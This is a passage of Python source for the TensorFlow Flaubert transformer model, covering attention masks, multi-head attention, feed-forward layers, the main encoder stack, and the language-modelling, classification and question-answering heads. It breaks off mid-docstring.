        `(mask, attn_mask)` where `attn_mask` equals `mask` in the non-causal case.
    """
    bs = shape_list(lengths)[0]
    # Position indices 0..slen-1. Hoisted out of the branch below: the causal mask
    # needs `alen` even when a precomputed `padding_mask` is supplied (previously
    # this raised a NameError for padding_mask + causal).
    alen = tf.range(slen, dtype=lengths.dtype)
    if padding_mask is not None:
        mask = padding_mask
    else:
        # assert lengths.max().item() <= slen
        mask = alen < tf.expand_dims(lengths, axis=1)
    # attention mask is the same as mask, or triangular inferior attention (causal)
    if causal:
        attn_mask = tf.less_equal(
            tf.tile(tf.reshape(alen, (1, 1, slen)), (bs, slen, 1)), tf.reshape(alen, (1, slen, 1))
        )
    else:
        attn_mask = mask
    # sanity check
    tf.debugging.assert_equal(shape_list(mask), [bs, slen])
    if causal:
        tf.debugging.assert_equal(shape_list(attn_mask), [bs, slen, slen])
    return mask, attn_mask
class TFFlaubertPreTrainedModel(TFPreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = FlaubertConfig
    base_model_prefix = "transformer"

    @property
    def dummy_inputs(self):
        """Dummy tensors used to build the network; `langs` is included only when language embeddings are in use."""
        input_ids = tf.constant([[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]], dtype=tf.int32)
        attention_mask = tf.constant([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]], dtype=tf.int32)
        dummies = {"input_ids": input_ids, "attention_mask": attention_mask}
        # Sometimes Flaubert has language embeddings, so don't forget to build them as well if needed
        if self.config.use_lang_emb and self.config.n_langs > 1:
            dummies["langs"] = tf.constant([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]], dtype=tf.int32)
        return dummies
@add_start_docstrings(
    "The bare Flaubert Model transformer outputting raw hidden-states without any specific head on top.",
    FLAUBERT_START_DOCSTRING,
)
class TFFlaubertModel(TFFlaubertPreTrainedModel):
    # Thin wrapper: all real work happens in the shared TFFlaubertMainLayer.
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.transformer = TFFlaubertMainLayer(config, name="transformer")

    @unpack_inputs
    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFBaseModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def call(
        self,
        input_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: Optional[bool] = False,
    ) -> Union[Tuple, TFBaseModelOutput]:
        # Forward every argument unchanged to the main layer; user-facing docs are
        # attached by the decorators above.
        outputs = self.transformer(
            input_ids=input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        return outputs

    # Copied from transformers.models.distilbert.modeling_tf_distilbert.TFDistilBertModel.serving_output
    def serving_output(self, output):
        # Tuples of per-layer tensors are stacked into single tensors for the TF serving signature.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
        return TFBaseModelOutput(last_hidden_state=output.last_hidden_state, hidden_states=hs, attentions=attns)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMMultiHeadAttention with XLM->Flaubert
class TFFlaubertMultiHeadAttention(tf.keras.layers.Layer):
    """Multi-head (self- or cross-) attention with optional incremental decoding cache."""

    # Each instance gets a unique id, used as its key in the decoding cache dict.
    NEW_ID = itertools.count()

    def __init__(self, n_heads, dim, config, **kwargs):
        super().__init__(**kwargs)
        self.layer_id = next(TFFlaubertMultiHeadAttention.NEW_ID)
        self.dim = dim
        self.n_heads = n_heads
        self.output_attentions = config.output_attentions
        assert self.dim % self.n_heads == 0
        self.q_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="q_lin")
        self.k_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="k_lin")
        self.v_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="v_lin")
        self.out_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="out_lin")
        self.dropout = tf.keras.layers.Dropout(config.attention_dropout)
        self.pruned_heads = set()

    def prune_heads(self, heads):
        raise NotImplementedError

    def call(self, input, mask, kv, cache, head_mask, output_attentions, training=False):
        """
        Self-attention (if kv is None) or attention over source sentence (provided by kv).
        """
        # Input is (bs, qlen, dim)
        # Mask is (bs, klen) (non-causal) or (bs, klen, klen)
        bs, qlen, dim = shape_list(input)
        if kv is None:
            # Self-attention: with a cache, keys/values cover the cached prefix plus the new tokens.
            klen = qlen if cache is None else cache["slen"] + qlen
        else:
            klen = shape_list(kv)[1]
        # assert dim == self.dim, f'Dimensions do not match: {dim} input vs {self.dim} configured'
        dim_per_head = self.dim // self.n_heads
        mask_reshape = (bs, 1, qlen, klen) if len(shape_list(mask)) == 3 else (bs, 1, 1, klen)

        def shape(x):
            """projection"""
            return tf.transpose(tf.reshape(x, (bs, -1, self.n_heads, dim_per_head)), perm=(0, 2, 1, 3))

        def unshape(x):
            """compute context"""
            return tf.reshape(tf.transpose(x, perm=(0, 2, 1, 3)), (bs, -1, self.n_heads * dim_per_head))

        q = shape(self.q_lin(input))  # (bs, n_heads, qlen, dim_per_head)
        if kv is None:
            k = shape(self.k_lin(input))  # (bs, n_heads, qlen, dim_per_head)
            v = shape(self.v_lin(input))  # (bs, n_heads, qlen, dim_per_head)
        elif cache is None or self.layer_id not in cache:
            # Cross-attention keys/values are projected only once; afterwards they come from the cache.
            k = v = kv
            k = shape(self.k_lin(k))  # (bs, n_heads, qlen, dim_per_head)
            v = shape(self.v_lin(v))  # (bs, n_heads, qlen, dim_per_head)
        if cache is not None:
            if self.layer_id in cache:
                if kv is None:
                    # Self-attention: append the new keys/values to the cached prefix.
                    k_, v_ = cache[self.layer_id]
                    k = tf.concat([k_, k], axis=2)  # (bs, n_heads, klen, dim_per_head)
                    v = tf.concat([v_, v], axis=2)  # (bs, n_heads, klen, dim_per_head)
                else:
                    # Cross-attention: the source projections never change, reuse them as-is.
                    k, v = cache[self.layer_id]
            cache[self.layer_id] = (k, v)
        # Scale queries instead of scores (mathematically equivalent).
        f_dim_per_head = tf.cast(dim_per_head, dtype=q.dtype)
        q = tf.multiply(q, tf.math.rsqrt(f_dim_per_head))  # (bs, n_heads, qlen, dim_per_head)
        k = tf.cast(k, dtype=q.dtype)
        scores = tf.matmul(q, k, transpose_b=True)  # (bs, n_heads, qlen, klen)
        mask = tf.reshape(mask, mask_reshape)  # (bs, n_heads, qlen, klen)
        # scores.masked_fill_(mask, -float('inf'))  # (bs, n_heads, qlen, klen)
        # Additive masking: masked positions get a large negative bias before softmax.
        mask = tf.cast(mask, dtype=scores.dtype)
        scores = scores - 1e30 * (1.0 - mask)
        weights = stable_softmax(scores, axis=-1)  # (bs, n_heads, qlen, klen)
        weights = self.dropout(weights, training=training)  # (bs, n_heads, qlen, klen)
        # Mask heads if we want to
        if head_mask is not None:
            weights = weights * head_mask
        context = tf.matmul(weights, v)  # (bs, n_heads, qlen, dim_per_head)
        context = unshape(context)  # (bs, qlen, dim)
        outputs = (self.out_lin(context),)
        if output_attentions:
            outputs = outputs + (weights,)
        return outputs
class TFFlaubertTransformerFFN(tf.keras.layers.Layer):
    """Position-wise feed-forward block: Dense -> GELU/ReLU -> Dense -> Dropout."""

    def __init__(self, in_dim, dim_hidden, out_dim, config, **kwargs):
        super().__init__(**kwargs)
        self.lin1 = tf.keras.layers.Dense(dim_hidden, kernel_initializer=get_initializer(config.init_std), name="lin1")
        self.lin2 = tf.keras.layers.Dense(out_dim, kernel_initializer=get_initializer(config.init_std), name="lin2")
        act_name = "gelu" if config.gelu_activation else "relu"
        self.act = get_tf_activation(act_name)
        self.dropout = tf.keras.layers.Dropout(config.dropout)

    def call(self, input, training=False):
        hidden = self.act(self.lin1(input))
        return self.dropout(self.lin2(hidden), training=training)
@keras_serializable
class TFFlaubertMainLayer(tf.keras.layers.Layer):
    """
    Core Flaubert transformer stack (embeddings + self-attention/FFN layers), shared by the
    bare model and all task-specific heads.
    """

    config_class = FlaubertConfig

    def __init__(self, config, **kwargs):
        super().__init__(**kwargs)
        self.config = config
        self.n_heads = config.n_heads
        self.n_langs = config.n_langs
        self.dim = config.emb_dim
        self.hidden_dim = self.dim * 4
        self.n_words = config.n_words
        self.pad_index = config.pad_index
        self.causal = config.causal
        self.n_layers = config.n_layers
        self.use_lang_emb = config.use_lang_emb
        self.layerdrop = getattr(config, "layerdrop", 0.0)
        self.pre_norm = getattr(config, "pre_norm", False)
        self.output_attentions = config.output_attentions
        self.output_hidden_states = config.output_hidden_states
        self.return_dict = config.use_return_dict
        self.max_position_embeddings = config.max_position_embeddings
        self.embed_init_std = config.embed_init_std
        self.dropout = tf.keras.layers.Dropout(config.dropout)
        # Word embeddings are shared with the output projection (see TFFlaubertPredLayer).
        self.embeddings = TFSharedEmbeddings(
            self.n_words, self.dim, initializer_range=config.embed_init_std, name="embeddings"
        )
        self.layer_norm_emb = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="layer_norm_emb")
        self.attentions = []
        self.layer_norm1 = []
        self.ffns = []
        self.layer_norm2 = []
        for i in range(self.n_layers):
            self.attentions.append(
                TFFlaubertMultiHeadAttention(self.n_heads, self.dim, config=config, name=f"attentions_._{i}")
            )
            self.layer_norm1.append(
                tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name=f"layer_norm1_._{i}")
            )
            # if self.is_decoder:
            #     self.layer_norm15.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
            #     self.encoder_attn.append(MultiHeadAttention(self.n_heads, self.dim, dropout=self.attention_dropout))
            self.ffns.append(
                TFFlaubertTransformerFFN(self.dim, self.hidden_dim, self.dim, config=config, name=f"ffns_._{i}")
            )
            self.layer_norm2.append(
                tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name=f"layer_norm2_._{i}")
            )

    def build(self, input_shape):
        """Create the position (and, if configured, language) embedding weights."""
        with tf.name_scope("position_embeddings"):
            self.position_embeddings = self.add_weight(
                name="embeddings",
                shape=[self.max_position_embeddings, self.dim],
                initializer=get_initializer(self.embed_init_std),
            )
        if self.n_langs > 1 and self.use_lang_emb:
            with tf.name_scope("lang_embeddings"):
                self.lang_embeddings = self.add_weight(
                    name="embeddings",
                    shape=[self.n_langs, self.dim],
                    initializer=get_initializer(self.embed_init_std),
                )
        super().build(input_shape)

    def get_input_embeddings(self):
        return self.embeddings

    def set_input_embeddings(self, value):
        self.embeddings.weight = value
        self.embeddings.vocab_size = shape_list(value)[0]

    @unpack_inputs
    def call(
        self,
        input_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: Optional[bool] = False,
    ) -> Union[Tuple, TFBaseModelOutput]:
        """Run the full transformer stack; see FLAUBERT_INPUTS_DOCSTRING for argument semantics."""
        # removed: src_enc=None, src_len=None
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            bs, slen = shape_list(input_ids)
        elif inputs_embeds is not None:
            bs, slen = shape_list(inputs_embeds)[:2]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")
        if lengths is None:
            if input_ids is not None:
                # Infer real sequence lengths by counting non-padding tokens.
                lengths = tf.reduce_sum(
                    tf.cast(tf.not_equal(input_ids, self.pad_index), dtype=input_ids.dtype), axis=1
                )
            else:
                lengths = tf.convert_to_tensor([slen] * bs)
        # mask = input_ids != self.pad_index
        # check inputs
        # FIX: the messages below used to sit in a dead trailing tuple
        # (`assert_equal(...), f"..."`) and were never attached to the assertion.
        tf.debugging.assert_equal(
            shape_list(lengths)[0],
            bs,
            message=f"Expected batch size {shape_list(lengths)[0]} and received batch size {bs} mismatched",
        )
        # assert lengths.max().item() <= slen
        # input_ids = input_ids.transpose(0, 1)  # batch size as dimension 0
        # assert (src_enc is None) == (src_len is None)
        # if src_enc is not None:
        #     assert self.is_decoder
        #     assert src_enc.size(0) == bs
        # generate masks
        mask, attn_mask = get_masks(slen, lengths, self.causal, padding_mask=attention_mask)
        # if self.is_decoder and src_enc is not None:
        #     src_mask = torch.arange(src_len.max(), dtype=torch.long, device=lengths.device) < src_len[:, None]
        # position_ids
        if position_ids is None:
            position_ids = tf.expand_dims(tf.range(slen), axis=0)
            position_ids = tf.tile(position_ids, (bs, 1))
        tf.debugging.assert_equal(
            shape_list(position_ids),
            [bs, slen],
            message=f"Position id shape {shape_list(position_ids)} and input shape {[bs, slen]} mismatched",
        )
        # position_ids = position_ids.transpose(0, 1)
        # langs
        if langs is not None:
            tf.debugging.assert_equal(
                shape_list(langs),
                [bs, slen],
                message=f"Lang shape {shape_list(langs)} and input shape {[bs, slen]} mismatched",
            )
            # langs = langs.transpose(0, 1)
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x qlen x klen]
        if head_mask is not None:
            raise NotImplementedError
        else:
            head_mask = [None] * self.n_layers
        # do not recompute cached elements
        if cache is not None and input_ids is not None:
            _slen = slen - cache["slen"]
            input_ids = input_ids[:, -_slen:]
            position_ids = position_ids[:, -_slen:]
            if langs is not None:
                langs = langs[:, -_slen:]
            mask = mask[:, -_slen:]
            attn_mask = attn_mask[:, -_slen:]
        # embeddings
        if inputs_embeds is None:
            # Note: tf.gather, on which the embedding layer is based, won't check positive out of bound
            # indices on GPU, returning zeros instead. This is a dangerous silent behavior.
            tf.debugging.assert_less(
                input_ids,
                tf.cast(self.embeddings.vocab_size, dtype=input_ids.dtype),
                message=(
                    "input_ids must be smaller than the embedding layer's input dimension (got"
                    f" {tf.math.reduce_max(input_ids)} >= {self.embeddings.vocab_size})"
                ),
            )
            inputs_embeds = self.embeddings(input_ids)
        tensor = inputs_embeds + tf.gather(self.position_embeddings, position_ids)
        if langs is not None and self.use_lang_emb:
            tensor = tensor + tf.gather(self.lang_embeddings, langs)
        if token_type_ids is not None:
            # Token type ids are looked up in the word-embedding table (upstream XLM behavior).
            tensor = tensor + self.embeddings(token_type_ids)
        tensor = self.layer_norm_emb(tensor)
        tensor = self.dropout(tensor, training=training)
        # Zero out embeddings at padding positions.
        mask = tf.cast(mask, dtype=tensor.dtype)
        tensor = tensor * tf.expand_dims(mask, axis=-1)
        # hidden_states and attentions cannot be None in graph mode.
        hidden_states = () if output_hidden_states else None
        attentions = () if output_attentions else None
        # transformer layers
        for i in range(self.n_layers):
            # LayerDrop: randomly skip whole layers during training.
            dropout_probability = random.uniform(0, 1)
            if training and (dropout_probability < self.layerdrop):
                continue
            if output_hidden_states:
                hidden_states = hidden_states + (tensor,)
            # self attention (post-norm vs pre-norm variants)
            if not self.pre_norm:
                attn_outputs = self.attentions[i](
                    tensor,
                    attn_mask,
                    None,
                    cache,
                    head_mask[i],
                    output_attentions,
                    training=training,
                )
                attn = attn_outputs[0]
                if output_attentions:
                    attentions = attentions + (attn_outputs[1],)
                attn = self.dropout(attn, training=training)
                tensor = tensor + attn
                tensor = self.layer_norm1[i](tensor)
            else:
                tensor_normalized = self.layer_norm1[i](tensor)
                attn_outputs = self.attentions[i](
                    tensor_normalized,
                    attn_mask,
                    None,
                    cache,
                    head_mask[i],
                    output_attentions,
                    training=training,
                )
                attn = attn_outputs[0]
                if output_attentions:
                    attentions = attentions + (attn_outputs[1],)
                attn = self.dropout(attn, training=training)
                tensor = tensor + attn
            # encoder attention (for decoder only)
            # if self.is_decoder and src_enc is not None:
            #     attn = self.encoder_attn[i](tensor, src_mask, kv=src_enc, cache=cache)
            #     attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
            #     tensor = tensor + attn
            #     tensor = self.layer_norm15[i](tensor)
            # FFN
            if not self.pre_norm:
                tensor = tensor + self.ffns[i](tensor)
                tensor = self.layer_norm2[i](tensor)
            else:
                tensor_normalized = self.layer_norm2[i](tensor)
                tensor = tensor + self.ffns[i](tensor_normalized)
            tensor = tensor * tf.expand_dims(mask, axis=-1)
        # Add last hidden state
        if output_hidden_states:
            hidden_states = hidden_states + (tensor,)
        # update cache length
        if cache is not None:
            # FIX: was `tensor.size(1)` (PyTorch API) — tf.Tensor has no `.size(1)`,
            # so this crashed whenever the incremental-decoding cache was used.
            cache["slen"] += shape_list(tensor)[1]
        # move back sequence length to dimension 0
        # tensor = tensor.transpose(0, 1)
        if not return_dict:
            return tuple(v for v in [tensor, hidden_states, attentions] if v is not None)
        return TFBaseModelOutput(last_hidden_state=tensor, hidden_states=hidden_states, attentions=attentions)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMPredLayer
class TFFlaubertPredLayer(tf.keras.layers.Layer):
    """
    Vocabulary prediction head (cross-entropy variant; adaptive softmax is not implemented).

    The projection reuses the input embedding matrix (weight tying); only a per-token
    output bias is owned by this layer.
    """

    def __init__(self, config, input_embeddings, **kwargs):
        super().__init__(**kwargs)
        self.asm = config.asm
        self.n_words = config.n_words
        self.pad_index = config.pad_index
        # Only the non-adaptive (cross-entropy) head has been ported to TF.
        if config.asm is not False:
            raise NotImplementedError
        self.input_embeddings = input_embeddings

    def build(self, input_shape):
        # The output weights come from the tied input embeddings; only an
        # output-only bias (one scalar per vocabulary token) is created here.
        self.bias = self.add_weight(shape=(self.n_words,), initializer="zeros", trainable=True, name="bias")

        super().build(input_shape)

    def get_output_embeddings(self):
        return self.input_embeddings

    def set_output_embeddings(self, value):
        self.input_embeddings.weight = value
        self.input_embeddings.vocab_size = shape_list(value)[0]

    def get_bias(self):
        return {"bias": self.bias}

    def set_bias(self, value):
        self.bias = value["bias"]
        self.vocab_size = shape_list(value["bias"])[0]

    def call(self, hidden_states):
        # Project hidden states onto the vocabulary with the tied embedding
        # matrix, then add the learned output bias.
        projected = self.input_embeddings(hidden_states, mode="linear")
        return projected + self.bias
@dataclass
class TFFlaubertWithLMHeadModelOutput(ModelOutput):
    """
    Base class for [`TFFlaubertWithLMHeadModel`] outputs.

    Args:
        logits (`tf.Tensor` of shape `(batch_size, sequence_length, config.vocab_size)`):
            Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
        hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
            `(batch_size, sequence_length, hidden_size)`.

            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`.

            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    """

    # Pre-softmax vocabulary scores, shape (batch, seq_len, vocab_size).
    logits: tf.Tensor = None
    # Per-layer hidden states (embeddings output first); None unless requested.
    hidden_states: Optional[Tuple[tf.Tensor]] = None
    # Per-layer attention weights; None unless requested.
    attentions: Optional[Tuple[tf.Tensor]] = None
@add_start_docstrings(
    """
    The Flaubert Model transformer with a language modeling head on top (linear layer with weights tied to the input
    embeddings).
    """,
    FLAUBERT_START_DOCSTRING,
)
class TFFlaubertWithLMHeadModel(TFFlaubertPreTrainedModel):
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.transformer = TFFlaubertMainLayer(config, name="transformer")
        # The prediction layer ties its projection weights to the transformer's input embeddings.
        self.pred_layer = TFFlaubertPredLayer(config, self.transformer.embeddings, name="pred_layer_._proj")
        # Flaubert does not have past caching features
        self.supports_xla_generation = False

    def get_lm_head(self):
        # Expose the LM head so shared utilities (weight tying / resizing) can find it.
        return self.pred_layer

    def get_prefix_bias_name(self):
        warnings.warn("The method get_prefix_bias_name is deprecated. Please use `get_bias` instead.", FutureWarning)
        return self.name + "/" + self.pred_layer.name

    def prepare_inputs_for_generation(self, inputs, **kwargs):
        """Append a mask token (and matching language ids) so generation predicts the next token MLM-style."""
        mask_token_id = self.config.mask_token_id
        lang_id = self.config.lang_id

        effective_batch_size = inputs.shape[0]
        # One mask token per sequence, appended at the end of each input.
        mask_token = tf.fill((effective_batch_size, 1), 1) * mask_token_id
        inputs = tf.concat([inputs, mask_token], axis=1)

        if lang_id is not None:
            langs = tf.ones_like(inputs) * lang_id
        else:
            langs = None
        return {"input_ids": inputs, "langs": langs}

    @unpack_inputs
    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFFlaubertWithLMHeadModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def call(
        self,
        input_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: Optional[bool] = False,
    ) -> Union[Tuple, TFFlaubertWithLMHeadModelOutput]:
        # Run the base transformer, then project hidden states onto the vocabulary.
        transformer_outputs = self.transformer(
            input_ids=input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        output = transformer_outputs[0]
        outputs = self.pred_layer(output)

        if not return_dict:
            return (outputs,) + transformer_outputs[1:]

        return TFFlaubertWithLMHeadModelOutput(
            logits=outputs, hidden_states=transformer_outputs.hidden_states, attentions=transformer_outputs.attentions
        )

    def serving_output(self, output):
        # Convert tuple-typed outputs to dense tensors for the SavedModel serving signature.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFFlaubertWithLMHeadModelOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
    """
    Flaubert Model with a sequence classification/regression head on top (a linear layer on top of the pooled output)
    e.g. for GLUE tasks.
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForSequenceClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForSequenceClassification(TFFlaubertPreTrainedModel, TFSequenceClassificationLoss):
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.num_labels = config.num_labels

        self.transformer = TFFlaubertMainLayer(config, name="transformer")
        # Pools the sequence of hidden states into a single vector per example.
        self.sequence_summary = TFSequenceSummary(config, initializer_range=config.init_std, name="sequence_summary")

    @unpack_inputs
    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFSequenceClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def call(
        self,
        input_ids: Optional[TFModelInputType] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
        training: bool = False,
    ) -> Union[TFSequenceClassifierOutput, Tuple[tf.Tensor]]:
        r"""
        labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
            config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
            `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        transformer_outputs = self.transformer(
            input_ids=input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        output = transformer_outputs[0]

        # The summary module both pools and projects to num_labels here.
        logits = self.sequence_summary(output)

        loss = None if labels is None else self.hf_compute_loss(labels, logits)

        if not return_dict:
            output = (logits,) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFSequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForSequenceClassification.serving_output
    def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
        # Convert tuple-typed outputs to dense tensors for the SavedModel serving signature.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFSequenceClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
    """
    Flaubert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
    layer on top of the hidden-states output to compute `span start logits` and `span end logits`).
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForQuestionAnsweringSimple with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForQuestionAnsweringSimple(TFFlaubertPreTrainedModel, TFQuestionAnsweringLoss):
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.transformer = TFFlaubertMainLayer(config, name="transformer")
        # Single dense layer producing start/end logits (num_labels == 2 for QA).
        self.qa_outputs = tf.keras.layers.Dense(
            config.num_labels, kernel_initializer=get_initializer(config.init_std), name="qa_outputs"
        )

    @unpack_inputs
    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFQuestionAnsweringModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def call(
        self,
        input_ids: Optional[TFModelInputType] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        start_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
        end_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
        training: bool = False,
    ) -> Union[TFQuestionAnsweringModelOutput, Tuple[tf.Tensor]]:
        r"""
        start_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
